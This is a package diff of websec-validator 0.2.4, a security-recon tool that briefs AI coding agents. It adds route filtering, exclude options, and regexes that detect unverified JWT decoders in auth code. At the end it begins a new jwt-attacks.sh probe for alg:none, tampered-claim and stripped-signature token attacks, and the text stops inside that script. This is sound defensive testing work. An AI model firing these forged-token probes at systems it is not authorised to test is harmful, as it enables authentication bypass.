websec-validator 0.2.3__tar.gz → 0.2.4__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (59) hide show
  1. {websec_validator-0.2.3/src/websec_validator.egg-info → websec_validator-0.2.4}/PKG-INFO +1 -1
  2. {websec_validator-0.2.3 → websec_validator-0.2.4}/pyproject.toml +1 -1
  3. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/briefing.py +1 -0
  4. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/cli.py +7 -2
  5. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/__init__.py +2 -2
  6. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/authz.py +16 -0
  7. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/base.py +8 -1
  8. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/routes.py +49 -18
  9. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/findings.py +14 -0
  10. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/recon.py +2 -2
  11. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/report.py +7 -3
  12. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/scanners.py +13 -8
  13. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/bola-cross-tenant.sh +2 -1
  14. websec_validator-0.2.4/src/websec_validator/templates/probes/jwt-attacks.sh +61 -0
  15. websec_validator-0.2.4/src/websec_validator/templates/probes/ssrf-probes.sh +62 -0
  16. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/unauth-baseline.sh +2 -1
  17. {websec_validator-0.2.3 → websec_validator-0.2.4/src/websec_validator.egg-info}/PKG-INFO +1 -1
  18. {websec_validator-0.2.3 → websec_validator-0.2.4}/tests/test_recon.py +37 -1
  19. websec_validator-0.2.3/src/websec_validator/templates/probes/jwt-attacks.sh +0 -161
  20. websec_validator-0.2.3/src/websec_validator/templates/probes/ssrf-probes.sh +0 -189
  21. {websec_validator-0.2.3 → websec_validator-0.2.4}/LICENSE +0 -0
  22. {websec_validator-0.2.3 → websec_validator-0.2.4}/README.md +0 -0
  23. {websec_validator-0.2.3 → websec_validator-0.2.4}/setup.cfg +0 -0
  24. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/__init__.py +0 -0
  25. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/calibration.json +0 -0
  26. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/calibration.py +0 -0
  27. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/constitution.py +0 -0
  28. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/corpus.json +0 -0
  29. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/dynamic.py +0 -0
  30. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/auth.py +0 -0
  31. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/client_exposure.py +0 -0
  32. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/graphql.py +0 -0
  33. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/iac_ci.py +0 -0
  34. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/integrations.py +0 -0
  35. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/schemas.py +0 -0
  36. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/stack.py +0 -0
  37. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/surface.py +0 -0
  38. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/tenant.py +0 -0
  39. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/probes.py +0 -0
  40. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/proof.py +0 -0
  41. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/_lib.py +0 -0
  42. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/bola-write-verbs.py +0 -0
  43. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/compare-roles.sh +0 -0
  44. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/dlp-bypass-offline.py +0 -0
  45. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/hs256-brute-force.py +0 -0
  46. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/mass-assignment.py +0 -0
  47. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/race-conditions.py +0 -0
  48. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/rate-limit-burst.sh +0 -0
  49. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/s3-assess.sh +0 -0
  50. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/webhook-forgery.py +0 -0
  51. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/reports/FINDINGS-SUMMARY.md.template +0 -0
  52. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/reports/access-control-matrix.md.template +0 -0
  53. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/reports/findings-triage.md.template +0 -0
  54. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/reports/pentest-handover-brief.md.template +0 -0
  55. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/reports/per-tool-FINDINGS.md.template +0 -0
  56. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator.egg-info/SOURCES.txt +0 -0
  57. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator.egg-info/dependency_links.txt +0 -0
  58. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator.egg-info/entry_points.txt +0 -0
  59. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator.egg-info/top_level.txt +0 -0
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: websec-validator
3
- Version: 0.2.3
3
+ Version: 0.2.4
4
4
  Summary: Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app.
5
5
  Author: Ricardo Accioly
6
6
  License: MIT
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
4
4
 
5
5
  [project]
6
6
  name = "websec-validator"
7
- version = "0.2.3"
7
+ version = "0.2.4"
8
8
  description = "Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app."
9
9
  readme = "README.md"
10
10
  requires-python = ">=3.11"
@@ -118,6 +118,7 @@ credentials** — ask the human, never fabricate, never hit production.
118
118
  - **Datastores:** {", ".join(stack.get("datastores", [])) or "?"} · **Monorepo:** {stack.get("monorepo", False)}
119
119
  - **Auth scheme:** `{auth.get("scheme","?")}` (token in {auth.get("token_location","?")}) · guard files: {len(auth.get("guard_files", []))}
120
120
  - **Route engine:** {routes.get("engine","?")} · **{routes.get('count',0)} endpoints** · by method: {routes.get("by_method", {})}
121
+ {("> " + routes["note"]) if routes.get("note") else ""}
121
122
 
122
123
  ## 2. ★ Tenant boundary (confirm first — highest value, easiest to get wrong)
123
124
 
@@ -87,7 +87,7 @@ def cmd_run(args) -> int:
87
87
  print(f"websec-validator v{__version__} · target: {target} · run {ts}\n")
88
88
 
89
89
  # 1. recon
90
- facts = recon.build_facts(target, __version__)
90
+ facts = recon.build_facts(target, __version__, args.exclude)
91
91
  recon.write_facts(facts, out / "FACTS.json")
92
92
  langs = facts["stack"]["languages"]
93
93
  _print_facts_summary(facts)
@@ -98,7 +98,8 @@ def cmd_run(args) -> int:
98
98
  unified = None
99
99
  if args.scan:
100
100
  print("\n running available static scanners (read-only)…")
101
- scan_results = scanners.run_available(target, out, langs)
101
+ only = args.scanners.split(",") if args.scanners else None
102
+ scan_results = scanners.run_available(target, out, langs, excludes=args.exclude, only=only)
102
103
  for r in scan_results:
103
104
  tag = r.get("findings", r.get("status", "?"))
104
105
  print(f" {r['name']}: {tag}")
@@ -342,6 +343,10 @@ def build_parser() -> argparse.ArgumentParser:
342
343
  r.add_argument("target")
343
344
  r.add_argument("--scan", action="store_true", help="also execute available static scanners")
344
345
  r.add_argument("--out", help="output dir (default: ./websec-out)")
346
+ r.add_argument("--exclude", action="append", metavar="PATH",
347
+ help="exclude a path/glob from recon + scanners (repeatable; e.g. --exclude 'docs/**')")
348
+ r.add_argument("--scanners", metavar="A,B",
349
+ help="comma-separated subset of scanners to run with --scan (e.g. gitleaks,semgrep)")
345
350
  r.set_defaults(func=cmd_run)
346
351
 
347
352
  # recon/proof/calibrate are hidden from the main --help (argparse.SUPPRESS): recon is a
@@ -39,9 +39,9 @@ REGISTRY: list[Extractor] = [
39
39
  ]
40
40
 
41
41
 
42
- def run_all(root: Path, version: str) -> dict:
42
+ def run_all(root: Path, version: str, excludes: list | None = None) -> dict:
43
43
  """Walk the repo once, run every extractor, return the merged FACTS dict."""
44
- ctx = RepoContext(root)
44
+ ctx = RepoContext(root, excludes)
45
45
  facts: dict = {
46
46
  "tool": "websec-validator",
47
47
  "version": version,
@@ -52,6 +52,14 @@ ROLE = re.compile(
52
52
  r"has_?[Rr]ole\s*\(\s*['\"]([\w:.-]+)['\"]|"
53
53
  r"authorizeRoles\s*\(([^)]*)\)|permission_required\s*\(\s*['\"]([\w:.-]+)['\"]")
54
54
 
55
+ # F5: a call to a decoder/parser named "unsafe"/"unverified"/"noVerify"/"skipVerify"
56
+ # (e.g. decodeJwtPayloadUnsafe) — dangerous when its result feeds an auth decision.
57
+ UNSAFE_DECODER = re.compile(r"\b([A-Za-z_]\w*(?:[Uu]nsafe|[Uu]nverified|[Nn]o[Vv]erif\w*|[Ss]kip[Vv]erif\w*)\w*)\s*\(")
58
+ # does this file actually make an auth/identity decision? (so the unsafe decode matters)
59
+ AUTH_CONTEXT = re.compile(
60
+ r"require(?:Auth|Admin|Role|Permission)|isAdmin|authoriz|getToken\s*\(|getServerSession|"
61
+ r"req\.auth\b|currentUser|jwt\.(?:decode|verify)|decodeJwt", re.I)
62
+
55
63
 
56
64
  def _parse_next_middleware(ctx: RepoContext) -> dict:
57
65
  # Next 15.5+/16 renamed `middleware.ts` → `proxy.ts` (both filenames are valid; the
@@ -127,6 +135,13 @@ class AuthzExtractor(Extractor):
127
135
  if e.get("method") in WRITE_VERBS and not PUBLIC_HINT.search(e.get("path", "")):
128
136
  no_guard_writes.append(f"{e['method']} {e['path']} ({relcp or '?'})")
129
137
 
138
+ # F5: files that make an auth decision AND call an unsafe/unverified decoder
139
+ unsafe_decoders = []
140
+ for _p, rel, text in ctx.iter_code():
141
+ if AUTH_CONTEXT.search(text):
142
+ for dec in sorted(set(UNSAFE_DECODER.findall(text))):
143
+ unsafe_decoders.append({"file": rel, "decoder": dec})
144
+
130
145
  if global_auth:
131
146
  where = f"`{mw['file']}` (matcher {mw.get('matchers') or '—'})" if mw_auth else "`app.use(<auth>)`"
132
147
  note = (f"A GLOBAL auth middleware ({where}) was detected — most routes are protected by default. "
@@ -146,5 +161,6 @@ class AuthzExtractor(Extractor):
146
161
  "no_visible_guard": no_guard, "unknown": unknown},
147
162
  "endpoint_guards": egs[:400],
148
163
  "write_endpoints_without_visible_guard": sorted(set(no_guard_writes))[:60],
164
+ "unsafe_auth_decoders": unsafe_decoders[:30],
149
165
  "note": note,
150
166
  }
@@ -9,6 +9,7 @@ still say something useful.
9
9
 
10
10
  from __future__ import annotations
11
11
 
12
+ import fnmatch
12
13
  from pathlib import Path
13
14
 
14
15
  SKIP_DIRS = {".git", "node_modules", "dist", "build", ".next", ".nuxt", "venv",
@@ -27,13 +28,17 @@ MAX_BYTES = 2_000_000
27
28
  class RepoContext:
28
29
  """Walk the tree once; cache file text; serve cheap queries to every extractor."""
29
30
 
30
- def __init__(self, root: Path):
31
+ def __init__(self, root: Path, excludes: list | None = None):
31
32
  self.root = root
33
+ self.excludes = [e for e in (excludes or []) if e] # user --exclude paths/globs
32
34
  self._text: dict[Path, str] = {}
33
35
  self.code_files: list[Path] = []
34
36
  self.stack: dict = {} # filled by StackExtractor, read by the rest
35
37
  self._walk()
36
38
 
39
+ def _excluded(self, rel: str) -> bool:
40
+ return any(ex in rel or fnmatch.fnmatch(rel, ex) for ex in self.excludes)
41
+
37
42
  def _walk(self) -> None:
38
43
  n = 0
39
44
  for p in self.root.rglob("*"):
@@ -44,6 +49,8 @@ class RepoContext:
44
49
  # have its whole tree skipped.
45
50
  if p.is_dir() or any(part in SKIP_DIRS for part in p.relative_to(self.root).parts):
46
51
  continue
52
+ if self.excludes and self._excluded(str(p.relative_to(self.root))):
53
+ continue
47
54
  if p.suffix.lower() in CODE_EXT:
48
55
  self.code_files.append(p)
49
56
  n += 1
@@ -38,6 +38,20 @@ TRAVERSAL_NAMES = re.compile(r"^(file|filename|filepath|path|dir|folder|template
38
38
  TEMPLATED = ("BASE_URL", "localhost", "127.0.0.1", "${", "{{")
39
39
  ASSET_GLOB = re.compile(r"\*\.\w+")
40
40
 
41
+ # A route whose source file is a vendored/third-party API SPEC (OpenAPI/Swagger/GraphQL
42
+ # schema), not an app handler. Noir parses these and emits their paths as if the app
43
+ # served them — which on a repo that vendors e.g. a 16k-line swagger turns ~15 real
44
+ # findings into hundreds of phantom ones. We split these out as informational.
45
+ SPEC_PATH = re.compile(
46
+ r"\.(?:ya?ml|graphql|gql|raml)$" # spec file formats
47
+ r"|(?:^|/)(?:node_modules|vendor|vendored|third[_-]?party|examples?|schemas?"
48
+ r"|(?:docs?|documentation)[\w-]*)/" # vendor/docs/schema dirs
49
+ r"|swagger|openapi", re.I)
50
+
51
+
52
+ def _is_spec_derived(code_path: str) -> bool:
53
+ return bool(code_path) and bool(SPEC_PATH.search(code_path))
54
+
41
55
 
42
56
  def _clean_path(p: str) -> str:
43
57
  p = re.sub(r":(\w+)", r"{\1}", p) # Express :id -> {id}
@@ -53,16 +67,17 @@ def _is_noise(path: str) -> bool:
53
67
  return bool(ASSET_GLOB.search(path)) # static-asset glob route (/*.png)
54
68
 
55
69
 
56
- def _noir_scan(root: Path) -> list | None:
70
+ def _noir_scan(root: Path, extra_excludes: list | None = None) -> list | None:
57
71
  """Run Noir → list of endpoint dicts, or None if Noir unavailable/failed."""
58
72
  if not shutil.which("noir"):
59
73
  return None
74
+ excl = EXCLUDE_GLOBS + ("," + ",".join(extra_excludes) if extra_excludes else "")
60
75
  with tempfile.NamedTemporaryFile(suffix=".json", delete=False) as tf:
61
76
  out = Path(tf.name)
62
77
  try:
63
78
  proc = subprocess.run(
64
79
  ["noir", "scan", str(root), "-f", "json", "-o", str(out),
65
- "--exclude-path", EXCLUDE_GLOBS, "--no-log", "--no-color"],
80
+ "--exclude-path", excl, "--no-log", "--no-color"],
66
81
  capture_output=True, text=True, timeout=300)
67
82
  if not out.exists():
68
83
  return None
@@ -77,8 +92,10 @@ def _noir_scan(root: Path) -> list | None:
77
92
  pass
78
93
 
79
94
 
80
- def _normalize_noir(eps: list) -> list:
81
- rows, seen = [], set()
95
+ def _normalize_noir(eps: list) -> tuple:
96
+ """→ (app_routes, spec_derived_routes). Routes whose source file is a vendored API
97
+ spec are split out so they don't generate phantom findings (B1)."""
98
+ rows, spec, seen = [], [], set()
82
99
  for e in eps:
83
100
  if e.get("internal"):
84
101
  continue
@@ -89,21 +106,22 @@ def _normalize_noir(eps: list) -> list:
89
106
  if _is_noise(path):
90
107
  continue
91
108
  method = (e.get("method") or "GET").upper()
92
- if (method, path) in seen:
93
- continue
94
- seen.add((method, path))
95
- params = [{"name": p.get("name", ""), "where": p.get("param_type", "")}
96
- for p in (e.get("params") or [])]
97
109
  cp = (e.get("details", {}) or {}).get("code_paths") or [{}]
98
- rows.append({
110
+ code_path = cp[0].get("path", "")
111
+ if (method, path, code_path) in seen:
112
+ continue
113
+ seen.add((method, path, code_path))
114
+ row = {
99
115
  "method": method,
100
116
  "path": path,
101
- "params": params,
117
+ "params": [{"name": p.get("name", ""), "where": p.get("param_type", "")}
118
+ for p in (e.get("params") or [])],
102
119
  "technology": (e.get("details", {}) or {}).get("technology", ""),
103
- "code_path": cp[0].get("path", ""),
120
+ "code_path": code_path,
104
121
  "source": "noir",
105
- })
106
- return rows
122
+ }
123
+ (spec if _is_spec_derived(code_path) else rows).append(row)
124
+ return rows, spec
107
125
 
108
126
 
109
127
  # ---- regex fallback (only when Noir is absent) ---------------------------------------------
@@ -193,19 +211,23 @@ class RoutesExtractor(Extractor):
193
211
  category = "surface"
194
212
 
195
213
  def extract(self, ctx: RepoContext, facts: dict) -> dict:
196
- eps = _noir_scan(ctx.root)
214
+ eps = _noir_scan(ctx.root, getattr(ctx, "excludes", None))
197
215
  if eps is not None:
198
- routes = _normalize_noir(eps)
216
+ routes, spec_derived = _normalize_noir(eps)
199
217
  engine = "noir"
200
218
  else:
201
- routes = _fallback(ctx)
219
+ routes, spec_derived = _fallback(ctx), []
202
220
  engine = "regex-fallback (install OWASP Noir for full coverage: brew install noir)"
221
+ # honor user --exclude against route code_paths too (Noir's own --exclude-path glob is
222
+ # unreliable for bare dir names; this guarantees `--exclude <path>` drops those routes).
223
+ if getattr(ctx, "excludes", None):
224
+ routes = [r for r in routes if not ctx._excluded(r.get("code_path", ""))]
203
225
  by_method: dict = {}
204
226
  by_tech: dict = {}
205
227
  for r in routes:
206
228
  by_method[r["method"]] = by_method.get(r["method"], 0) + 1
207
229
  by_tech[r["technology"]] = by_tech.get(r["technology"], 0) + 1
208
- return {
230
+ out = {
209
231
  "engine": engine,
210
232
  "count": len(routes),
211
233
  "by_method": by_method,
@@ -213,3 +235,12 @@ class RoutesExtractor(Extractor):
213
235
  "endpoints": routes,
214
236
  "targeting": _derive(routes),
215
237
  }
238
+ if spec_derived:
239
+ from collections import Counter
240
+ srcs = Counter(r["code_path"] for r in spec_derived)
241
+ out["spec_derived_excluded"] = len(spec_derived)
242
+ out["spec_derived_sources"] = [f"{n}× {f}" for f, n in srcs.most_common(8)]
243
+ out["note"] = (f"⚠ {len(spec_derived)} routes came from vendored API SPEC files "
244
+ f"(OpenAPI/Swagger/GraphQL), not app handlers — EXCLUDED from the {len(routes)} "
245
+ f"app routes + all findings. Sources: {', '.join(f for f, _ in srcs.most_common(5))}.")
246
+ return out
@@ -26,6 +26,9 @@ from . import calibration
26
26
  STANDARDS = {
27
27
  "missing-auth": (["CWE-862 Missing Authorization", "CWE-306 Missing Authentication"],
28
28
  "ASVS V4.1.1", ["API1:2023 BOLA", "API5:2023 BFLA"]),
29
+ "unsafe-auth-decoder": (["CWE-347 Improper Verification of Cryptographic Signature",
30
+ "CWE-345 Insufficient Verification of Data Authenticity"],
31
+ "ASVS V3.5.2", ["API2:2023 Broken Authentication"]),
29
32
  "bola": (["CWE-639 Authorization Bypass (IDOR)"], "ASVS V4.2.1", ["API1:2023 BOLA"]),
30
33
  "ssrf": (["CWE-918 SSRF"], "ASVS V12.6", ["API7:2023 SSRF"]),
31
34
  "secret": (["CWE-798 Hard-coded Credentials"], "ASVS V2.10", ["API8:2023 Misconfiguration"]),
@@ -48,6 +51,9 @@ REMEDIATION = {
48
51
  "missing-auth": "Add an auth guard to the handler (e.g. requireAuth()/getServerSession()), or a "
49
52
  "middleware matcher over /api/(.*) with an explicit public allowlist so it can't be forgotten.",
50
53
  "bola": "Enforce object ownership: verify the authenticated principal owns/can access the resource id (tenant scope).",
54
+ "unsafe-auth-decoder": "Verify the token/signature before trusting it for an auth/identity decision — use a "
55
+ "verifying decode (e.g. jwt.verify with the key / a checked session), never an *Unsafe* "
56
+ "or decode-only path whose output then feeds requireAuth/requireAdmin.",
51
57
  "ssrf": "Validate + allowlist outbound URLs; block RFC1918/IMDS/file://; never fetch a raw user-supplied URL.",
52
58
  "secret": "Rotate the credential, remove from code/history, load from a secrets manager.",
53
59
  "cve": "Upgrade the dependency to the fixed version.",
@@ -150,6 +156,14 @@ def build_ledger(facts: dict, unified: dict | None, dynamic: dict | None = None,
150
156
  [{"layer": "dynamic", "detail": f"cross-tenant GET returned another tenant's data "
151
157
  f"(HTTP {lk.get('status')}, {lk.get('direction')})"}]))
152
158
 
159
+ # ---- 1c. Unsafe/unverified decoder feeding an auth decision (F5) ----
160
+ for ud in ((facts.get("authz", {}) or {}).get("unsafe_auth_decoders", []) or []):
161
+ out.append(_f(f"Auth decision uses an unverified decoder: {ud.get('decoder')}", "access-control",
162
+ "unsafe-auth-decoder", "HIGH", "MEDIUM", ud.get("file", ""),
163
+ [{"layer": "recon", "detail": f"{ud.get('file')} makes an auth/identity decision AND calls "
164
+ f"{ud.get('decoder')}() — if that decodes a token/signature WITHOUT verifying it, a forged "
165
+ "value is trusted (the decodeJwtPayloadUnsafe → requireAdmin class of bug). Trace the call path."}]))
166
+
153
167
  # ---- 2. Static scanner findings (de-duplicated `unified`) ----
154
168
  cat_to_class = {"sca": "cve", "secret": "secret", "iac": "iac", "sast": "sast"}
155
169
  for t in (unified or {}).get("top", []):
@@ -14,8 +14,8 @@ from .extractors.base import RepoContext
14
14
  from .extractors.stack import StackExtractor
15
15
 
16
16
 
17
- def build_facts(root: Path, version: str) -> dict:
18
- return extractors.run_all(root, version)
17
+ def build_facts(root: Path, version: str, excludes: list | None = None) -> dict:
18
+ return extractors.run_all(root, version, excludes)
19
19
 
20
20
 
21
21
  def write_facts(facts: dict, out: Path) -> Path:
@@ -43,8 +43,12 @@ def render(facts: dict, scanners: dict, scan_results: list, unified: dict | None
43
43
  chain = " → ".join(e["layer"] for e in f["evidence"])
44
44
  api = (" · " + ", ".join(f["standards"]["owasp_api"])) if f["standards"]["owasp_api"] else ""
45
45
  cal = f.get("calibrated") or {}
46
- calstr = (f" · P(real)≈**{cal.get('p')}** CI {cal.get('ci')} (n={cal.get('n')}, {cal.get('basis')})"
47
- if cal else "")
46
+ if not cal:
47
+ calstr = ""
48
+ elif cal.get("n", 0) == 0 or str(cal.get("basis", "")).startswith("prior"):
49
+ calstr = " · P(real): _uncalibrated — verify manually_" # don't dress n=0 as a measurement (B4)
50
+ else:
51
+ calstr = f" · P(real)≈**{cal.get('p')}** CI {cal.get('ci')} (n={cal.get('n')}, {cal.get('basis')})"
48
52
  _ll.append(f"- **[{f['severity']}/{f['confidence']}]** {f['title']} \n"
49
53
  f" `{f['location']}` · evidence: {chain} · {cwe}{api}{calstr} \n"
50
54
  f" _fix:_ {f['remediation']}")
@@ -68,7 +72,7 @@ def render(facts: dict, scanners: dict, scan_results: list, unified: dict | None
68
72
  | | |
69
73
  |---|---|
70
74
  | Stack | {", ".join(stack.get("languages", [])) or "?"} · {", ".join(stack.get("frameworks", [])) or "?"} · {", ".join(stack.get("datastores", [])) or "?"} |
71
- | Endpoints | **{routes.get('count', 0)}** (via {routes.get('engine','?').split(' ')[0]}) |
75
+ | Endpoints | **{routes.get('count', 0)}** app routes (via {routes.get('engine','?').split(' ')[0]}){(" · " + str(routes.get('spec_derived_excluded')) + " spec-derived excluded") if routes.get('spec_derived_excluded') else ""} |
72
76
  | Auth | {facts.get('auth', {}).get('scheme','?')} · roles: {', '.join(authz.get('roles_detected', [])) or 'none'} |
73
77
  | Access control | {gs.get('with_visible_guard', 0)} guarded · **{gs.get('no_visible_guard', 0)} no visible guard** · global-middleware: {authz.get('global_auth_middleware', False)} |
74
78
  | Static scanner (raw, pre-triage) | {sev_line} |
@@ -40,27 +40,27 @@ EXCLUDE_DIRS = ("websec-out", "node_modules", ".next", "dist", "build", ".git",
40
40
  "security", ".venv", "venv", "__pycache__", ".mypy_cache", "coverage")
41
41
 
42
42
 
43
- def _trivy(target: Path, out: Path) -> list:
43
+ def _trivy(target: Path, out: Path, excludes=()) -> list:
44
44
  # SCA + secrets + IaC misconfig in one pass; pinned by the user's install.
45
45
  cmd = ["trivy", "fs", "--scanners", "vuln,secret,misconfig", "--format", "json", "--output", str(out)]
46
- for d in EXCLUDE_DIRS:
46
+ for d in list(EXCLUDE_DIRS) + list(excludes):
47
47
  cmd += ["--skip-dirs", d]
48
48
  return cmd + [str(target)]
49
49
 
50
50
 
51
- def _gitleaks(target: Path, out: Path) -> list:
51
+ def _gitleaks(target: Path, out: Path, excludes=()) -> list:
52
52
  return ["gitleaks", "detect", "--source", str(target), "--no-banner",
53
53
  "--report-format", "json", "--report-path", str(out)]
54
54
 
55
55
 
56
- def _semgrep(target: Path, out: Path) -> list:
56
+ def _semgrep(target: Path, out: Path, excludes=()) -> list:
57
57
  cmd = ["semgrep", "scan", "--config", "auto", "--json", "--output", str(out)]
58
- for d in EXCLUDE_DIRS:
58
+ for d in list(EXCLUDE_DIRS) + list(excludes):
59
59
  cmd += ["--exclude", d]
60
60
  return cmd + [str(target)]
61
61
 
62
62
 
63
- def _checkov(target: Path, out: Path) -> list:
63
+ def _checkov(target: Path, out: Path, excludes=()) -> list:
64
64
  return ["checkov", "-d", str(target), "--compact", "-o", "json",
65
65
  "--output-file-path", str(out.parent)]
66
66
 
@@ -103,26 +103,31 @@ def detect(stack_languages: list | None = None) -> dict:
103
103
 
104
104
 
105
105
  def run_available(target: Path, outdir: Path, stack_languages: list | None = None,
106
- timeout: int = 600) -> list:
106
+ timeout: int = 600, excludes: list | None = None, only: list | None = None) -> list:
107
107
  """Execute every available, runnable static scanner. Returns per-scanner status.
108
108
 
109
+ `excludes`: extra paths/dirs to skip (--exclude). `only`: run just these scanner keys.
109
110
  Raw JSON lands in outdir/scanners/<key>.json. We capture status only here;
110
111
  cross-tool normalization + de-duplication is a separate (next) step.
111
112
  """
112
113
  langs = set(stack_languages or [])
114
+ excludes = excludes or []
115
+ only = set(only) if only else None
113
116
  scan_dir = outdir / "scanners"
114
117
  scan_dir.mkdir(parents=True, exist_ok=True)
115
118
  results = []
116
119
  for s in REGISTRY:
117
120
  if s.argv is None:
118
121
  continue # detect-only for now
122
+ if only is not None and s.key not in only:
123
+ continue
119
124
  if s.languages and not (set(s.languages) & langs):
120
125
  continue
121
126
  if not shutil.which(s.binary):
122
127
  continue
123
128
  out_file = scan_dir / f"{s.key}.json"
124
129
  try:
125
- proc = subprocess.run(s.argv(target, out_file), capture_output=True,
130
+ proc = subprocess.run(s.argv(target, out_file, excludes), capture_output=True,
126
131
  text=True, timeout=timeout)
127
132
  results.append({"key": s.key, "name": s.name, "category": s.category,
128
133
  "exit_code": proc.returncode, "output": str(out_file),
@@ -18,7 +18,8 @@ if [ -z "${BASE:-}" ] || [ "${BASE#FILL}" != "$BASE" ]; then echo "Set TARGET=ht
18
18
  : "${GROUP_A:?set GROUP_A=<tenant/group id of account A>}"
19
19
  : "${GROUP_B:?set GROUP_B=<tenant/group id of account B>}"
20
20
 
21
- mapfile -t PATHS < <(python3 -c "
21
+ PATHS=() # (portable; macOS bash 3.2 lacks `mapfile`)
22
+ while IFS= read -r line; do [ -n "$line" ] && PATHS+=("$line"); done < <(python3 -c "
22
23
  import json
23
24
  c = json.load(open('$ctx'))['endpoints']
24
25
  cand = c.get('idor_candidates') or [w.split(' ',1)[1] for w in c.get('writes',[]) if ' ' in w]
@@ -0,0 +1,61 @@
1
+ #!/usr/bin/env bash
2
+ # jwt-attacks.sh — manual JWT attack probe (FACTS-driven; no app-specific login).
3
+ #
4
+ # Five classic JWT attacks, run against a protected endpoint with a token YOU supply:
5
+ # 1. alg:none — if accepted, total auth bypass. 2. tampered claims + wrong HS256 sig.
6
+ # 3. expired exp. 4. stripped signature. 5. garbage token. (each should 401/403)
7
+ # Optional 6. refresh-replay-after-logout if you set REFRESH_TOKEN + the routes exist.
8
+ #
9
+ # Env (see _lib.py): TARGET, TOKEN_A=<a real JWT from a logged-in TEST account>.
10
+ # Optional: TEST_PATH=/api/some/protected/route (else picked from probe-context.json),
11
+ # REFRESH_TOKEN, LOGOUT_PATH, REFRESH_PATH. Run only against a TEST instance.
12
+ set -uo pipefail
13
+ cd "$(dirname "$0")"
14
+ ctx=probe-context.json
15
+
16
+ TARGET="${TARGET:-$(python3 -c "import json;print(json.load(open('$ctx'))['target_base_url'])" 2>/dev/null)}"
17
+ if [ -z "${TARGET:-}" ] || [ "${TARGET#FILL}" != "$TARGET" ]; then echo "Set TARGET=http://host:port (or fill probe-context.json)"; exit 2; fi
18
+ : "${TOKEN_A:?set TOKEN_A=<a real JWT from a logged-in test account>}"
19
+ ACCESS_TOKEN="$TOKEN_A"
20
+ # a protected endpoint to fire forged tokens at (override with TEST_PATH)
21
+ TEST_PATH="${TEST_PATH:-$(python3 -c "import json;c=json.load(open('$ctx'))['endpoints'];print((c.get('idor_candidates') or c.get('writes') or ['/']).__getitem__(0).split(' ',1)[-1])" 2>/dev/null)}"
22
+ TEST_URL="$TARGET${TEST_PATH:-/}"
23
+
24
+ b64url() { python3 -c "import sys,base64; sys.stdout.write(base64.urlsafe_b64encode(sys.stdin.buffer.read()).decode().rstrip('='))"; }
25
+ IFS='.' read -r H P S <<< "$ACCESS_TOKEN"
26
+ PASS_COUNT=0; FAIL_COUNT=0; FAIL_LINES=()
27
+ check() {
28
+ if [ "$3" = "$2" ]; then printf ' PASS %-28s expected:%s actual:%s\n' "$1" "$2" "$3"; PASS_COUNT=$((PASS_COUNT+1));
29
